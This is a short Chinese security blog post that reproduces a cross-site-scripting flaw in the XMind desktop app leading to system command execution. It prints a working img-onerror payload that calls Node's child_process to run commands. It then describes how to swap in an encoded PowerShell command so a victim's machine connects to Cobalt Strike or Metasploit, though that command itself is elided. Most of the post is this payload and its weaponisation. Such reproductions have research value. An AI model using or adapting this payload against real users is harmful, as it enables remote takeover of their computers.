Adminxe's Blog | 低调求发展 - 潜心习安全 ,技术永无止境 | 谢谢您对本站的支持,有什么问题或者建议请及时联系:点击这里给我发消息

XMind-XSS-V8内核命令执行复现

渗透测试 Adminxe 3174℃ 0评论

0x00 前言

测试环境:

XMind 202005082128

0x01 payload(需要在大纲板块进行触发)

<img src=x onerror="const exec = require('child_process').exec;exec('whoami').stdout.on('data', function (data) {alert(data);})">

0x02 触发键

shift 
control 
option 
command

0x03 漏洞复现

1、命令执行

whoami

2、扩展上线CS

XSS执行系统命令,内核V8,上线到CS或者MSF,替换whoami,

通过对powershell进行编码,然后替换payload进行上线CS

payload:

<img src=x onerror="const exec = require('child_process').exec;exec('powershell(……)').stdout.on('data', function (data) {alert(data);})">

转载请注明:Adminxe's Blog » XMind-XSS-V8内核命令执行复现

喜欢 (35)or分享 (0)
发表我的评论
取消评论
表情

Hi,您需要填写昵称和邮箱!

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址
(1)个小伙伴在吐槽
  1. 学习了,涨姿势啊!!
    xxxxxxxxxx2021-06-11 14:44 回复